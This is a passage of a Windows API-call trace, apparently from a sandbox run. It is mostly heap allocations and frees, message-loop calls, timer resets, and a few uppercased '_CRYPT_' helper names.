lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56728 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0253.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0253.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0253.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0253.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0253.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0253.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0253.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0253.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0253.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0253.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0d70 | out: hHeap=0x970000) returned 1 [0253.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3bf0d70 [0253.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0b50 | out: hHeap=0x970000) returned 1 [0253.646] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0253.647] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0253.647] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0253.647] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0253.647] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0253.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0253.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0253.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0253.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0253.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0253.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0253.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0253.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0253.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0253.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0253.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0253.653] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0253.653] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0253.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0253.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0253.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0253.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0253.653] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0253.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0253.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0253.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0253.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0253.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0253.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0253.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0253.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0253.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0253.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0253.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0253.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0253.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x578) returned 0x3bf1510 [0253.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0253.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0253.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0253.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0253.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0253.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0253.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0253.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0253.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0253.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0253.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0253.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x578) returned 0x3bf1a90 [0253.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf1510 | out: hHeap=0x970000) returned 1 [0253.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0253.654] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0253.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0253.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0253.654] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0253.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0253.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0253.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0253.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0253.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.654] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0253.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0253.655] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0253.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0253.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0253.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516b8 [0253.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0253.655] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0253.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55f80 [0253.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0253.655] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0253.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55f80 | out: hHeap=0x970000) returned 1 [0253.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0253.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0253.655] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0253.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0253.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0253.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0253.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0253.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0253.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0253.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0253.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51670 [0253.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0253.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0253.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0253.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51688 [0253.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0253.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0253.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0253.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517d8 [0253.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51640 [0253.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0253.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0253.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0253.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0253.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0253.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0253.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0253.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0253.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0253.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0253.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0253.656] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0253.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0253.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0253.656] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0253.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0253.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0253.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0253.656] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0253.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0253.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0253.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0253.657] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0253.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0253.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0253.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0253.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0253.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0253.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0253.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0253.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0253.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0253.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0253.657] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0253.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0253.657] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0253.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0253.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0253.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0253.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0253.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0253.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0253.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0253.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0253.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0253.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0253.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0253.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0253.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0253.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0253.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x578) returned 0x3bf1510 [0253.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0253.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0253.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x578) returned 0x3bf2010 [0253.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0253.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0253.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf1510 | out: hHeap=0x970000) returned 1 [0253.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0253.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0253.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0253.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0253.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x578) returned 0x3bf1510 [0253.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf2010 | out: hHeap=0x970000) returned 1 [0253.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0253.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0253.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x578) returned 0x3bf2010 [0253.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf1510 | out: hHeap=0x970000) returned 1 [0253.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0253.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0253.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0253.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0253.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0253.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0253.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0253.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0253.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0d70 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0253.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 